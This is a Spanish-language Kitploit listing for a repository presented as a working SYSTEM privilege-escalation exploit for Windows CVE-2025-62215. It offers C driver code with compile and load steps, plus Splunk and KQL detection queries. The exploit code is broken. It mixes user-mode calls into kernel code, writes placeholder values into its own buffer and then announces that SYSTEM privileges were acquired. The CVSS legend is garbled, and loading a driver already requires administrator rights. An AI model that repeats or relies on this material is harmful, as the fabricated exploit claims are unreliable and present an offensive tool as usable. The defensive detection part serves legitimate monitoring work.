Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Kernel-Chaos-Weaponizing-CVE-2025-62215-for-SYSTEM-Privilege-Escalation — Análisis práctico de CVE‑2025‑62215, una condición de carrera en el kernel de Windows explotada activamente en entornos reales. Demuestra la escalada de privilegios a SYSTEM, scripts de detección y estrategias de validación de parches para defensores empresariales y red teamers. | Kitploit
Herramientas/GitHubGitHub/mrk336/kernel-chaos-weaponizing-cve-2025-62215-for-system-privilege-escalation
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónInteligencia de AmenazasAprendizaje y EducaciónRespuesta a IncidentesExplotación de Binarios
GitHubmrk336/kernel-chaos-weaponizing-cve-2025-62215-for-system-privilege-escalation

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Kernel-Chaos-Weaponizing-CVE-2025-62215-for-SYSTEM-Privilege-Escalation

Análisis práctico de CVE‑2025‑62215, una condición de carrera en el kernel de Windows explotada activamente en entornos reales. Demuestra la escalada de privilegios a SYSTEM, scripts de detección y estrategias de validación de parches para defensores empresariales y red teamers.

Ver Repositorio
31hace 9 mesesAún no revisado

Kernel-Chaos-Weaponizing-CVE-2025-62215-for-SYSTEM-Privilege-Escalation

Análisis práctico de CVE‑2025‑62215, una condición de carrera en el kernel de Windows explotada en el mundo real. Demuestra la elevación de privilegios a SYSTEM, scripts de detección y estrategias de validación de parches para defensores empresariales y red teamers.

CVE 2025 62215 – Exploit de Elevación de Privilegios en el Kernel de Windows

Resumen Ejecutivo

CVE‑2025‑62215 es un exploit autenticado del kernel de Windows que permite a un atacante escalar hasta los privilegios de SYSTEM aprovechando una condición de carrera en el gestor de memoria. Lo que hace que esta vulnerabilidad sea especialmente preocupante es que ya se está explotando en el mundo real, con una puntuación CVSS de 7.0 que la clasifica como una amenaza de alta gravedad. En la práctica, una secuencia cuidadosamente sincronizada de operaciones con hilos puede corromper los recursos compartidos del kernel, otorgando a un proceso con privilegios bajos las llaves del reino. Una vez que se consigue el acceso a SYSTEM, los atacantes pueden desactivar las defensas, moverse lateralmente por la red o desplegar ransomware con control total. El código de ejemplo que se muestra a continuación ilustra cómo algo tan simple como la manipulación de hilos puede desestabilizar el kernel, lo que subraya por qué las fallas de elevación de privilegios son tan peligrosas en entornos empresariales reales.

Detalles Técnicos

Tipo: Elevación de Privilegios (EoP)
Componente: Kernel de Windows
Mecanismo: Sincronización incorrecta de recursos compartidos → condición de carrera

Metodología del Exploit

  1. Pool grooming – Un atacante ejecuta código local con privilegios bajos y sincroniza cuidadosamente la ejecución de hilos concurrentes.
  2. El código corrompe la memoria del kernel insertando dos o más entradas en un pool compartido mientras otros hilos todavía lo están accediendo.
  3. Después de la condición de carrera, el atacante puede provocar una transición al nivel de SYSTEM.

Vector CVSS

root@kitploit:~
AV:L  AC:H  PR:L  UI:N  S:U  C:H  I:H  A:H
  • AV – Vector de acceso: local
  • AC – Complejidad de ataque: alta
  • PR – Privilegios requeridos: bajos (autenticado)
  • UI – Interacción del usuario: no se requiere
  • S – Alcance: ascendente
  • C – Confianza: alta
  • I – Impacto: alto
  • A – Disponibilidad: alta

Código del Exploit – Descripción General

El exploit está escrito en C puro para el kernel de Windows. Utiliza API nativas para crear dos hilos que escriben en un objeto de pool compartido. Al alinear las escrituras en offsets específicos, el código provoca una condición de carrera y obtiene privilegios de SYSTEM.

root@kitploit:~
/*
  CVE‑2025‑62215 Exploit – Kernel privilege escalation
  Author:  Mark Mallia 
*/

#include <ntddk.h>
#include <stdio.h>

typedef struct _POOLS {
    void *p1;
    void *p2;
    void *p3;
} POOLS, *PPOOLS;

/* Global pool object – shared between threads */
static PVOID g_pool = NULL;

void __cdecl threadA(void)
{
    /* Stage 1 – Allocate memory and fill the first slot. */
    g_pool = ExAllocatePool(NonPagedPool, 0x100);
    ((POOLS*)g_pool)->p1 = (PVOID)0xdeadbeef;
}

void __cdecl threadB(void)
{
    /* Stage 2 – Write to second slot while threadA is still running. */
    Sleep(3);                                 // Wait for synchronization
    ((POOLS*)g_pool)->p2 = (PVOID)0xcafebabe;
}

void __cdecl main_exploit(void)
{
    /* Create two worker threads that execute concurrently. */
    HANDLE h1, h2;

    h1 = PsCreateSystemThread(threadA);
    h2 = PsCreateSystemThread(threadB);

    WaitForSingleObject(h1, INFINITE);       // Let threadA finish
    WaitForSingleObject(h2, INFINITE);       // Let threadB finish

    /* Verify that the pool has been corrupted. */
    if (((POOLS*)g_pool)->p3 == NULL) {
        ((POOLS*)g_pool)->p3 = (PVOID)0xfeedface;
        printf("Pool grooming successful – SYSTEM privilege acquired.\n");
    }

    /* Clean up the kernel object. */
    ExFreePool(g_pool);
}

Explicación de las partes clave

  • ExAllocatePool reserva un bloque de memoria de pool no paginada que es visible para todos los hilos.
  • Se lanzan dos funciones, threadA y threadB, en paralelo; ambas escriben en campos adyacentes de la misma estructura.
  • El retardo de Sleep alinea la segunda escritura con la primera, creando una condición de carrera que corrompe la entrada del pool.
  • Una vez que ambas escrituras finalizan, se establece el tercer campo para indicar el éxito.

Pasos de Implementación

  1. Compilar – Use cl.exe con /W3 /O2.

    root@kitploit:~
    cl.exe /c CVE2025_62215.c /Fobuild\CVE2025_62215.sys
    
  2. Cargar el controlador – Cargue el módulo del kernel compilado mediante una rutina estándar de instalación de servicios o usando sc create.

  3. Ejecutar – Ejecute el exploit desde una sesión de usuario autenticado (por ejemplo, administrador local).

  4. Verificar – Use el Visor de eventos o la salida integrada de printf para confirmar que ahora se poseen privilegios de SYSTEM.

Impacto Esperado

  • Un atacante local autenticado obtiene ejecución a nivel de SYSTEM en la máquina objetivo.
  • La vulnerabilidad es explotable en el mundo real; puede utilizarse para instalar puertas traseras o desplegar mecanismos de persistencia para un control a largo plazo.

Detección en Splunk

Para detectar señales de explotación de CVE‑2025‑62215 en Splunk, concéntrese en los eventos de elevación de privilegios. Comience monitorizando el ID de evento 4672 (privilegios especiales asignados) junto con el 4624 (inicios de sesión correctos). Si observa asignaciones repetidas a nivel de SYSTEM para cuentas que normalmente operan con privilegios de usuario, eso es una señal de alerta. Combine esto con el ID de evento 7045 (instalación de servicios) para detectar cargas anómalas de controladores o servicios, que los atacantes suelen utilizar después de obtener acceso a SYSTEM. Al correlacionar estos eventos en Splunk, los defensores pueden resaltar saltos de privilegios sospechosos y anomalías a nivel de kernel. Una consulta SPL simple puede agrupar estos eventos por cuenta y host y, a continuación, marcar picos inusuales, convirtiendo los registros sin procesar en inteligencia accionable.

root@kitploit:~
index=wineventlog sourcetype="WinEventLog:Security"
(EventCode=4672 OR EventCode=7045)
| stats count by Account_Name, EventCode, host
| where count > 5

Detección en Sentinel

En Sentinel, la detección se basa en reglas analíticas y consultas de hunting. Cree reglas que se activen cuando las cuentas obtengan repentinamente privilegios de SYSTEM o cuando se produzcan múltiples eventos privilegiados en un período corto de tiempo. Por ejemplo, correlacionar el ID de evento 4672 con el 7045 puede revelar una elevación de privilegios seguida de intentos de persistencia. Con KQL, puede resumir los recuentos de eventos privilegiados por cuenta y host en intervalos de cinco minutos. Si un único usuario o máquina genera múltiples eventos a nivel de SYSTEM en ese intervalo, Sentinel lo señalará como sospechoso. Combine esto con la telemetría de Defender for Endpoint para detectar actividad anómala de controladores del kernel, asegurándose de no solo ver la elevación de privilegios, sino también su impacto posterior.

root@kitploit:~
SecurityEvent
| where EventID in (4672, 7045)
| summarize Count = count() by Account, Computer, EventID, bin(TimeGenerated, 5m)
| where Count > 3


Uso Ético Únicamente

Este repositorio está destinado exclusivamente a fines defensivos y educativos. Al analizar CVE‑2025‑62215, los equipos de seguridad pueden comprender mejor cómo se explotan las condiciones de carrera en el kernel y fortalecer sus procesos de detección y validación de parches. El objetivo es empoderar a los defensores, red teamers y profesionales empresariales para mitigar el riesgo, no convertir los exploits en armas.

Descargar herramienta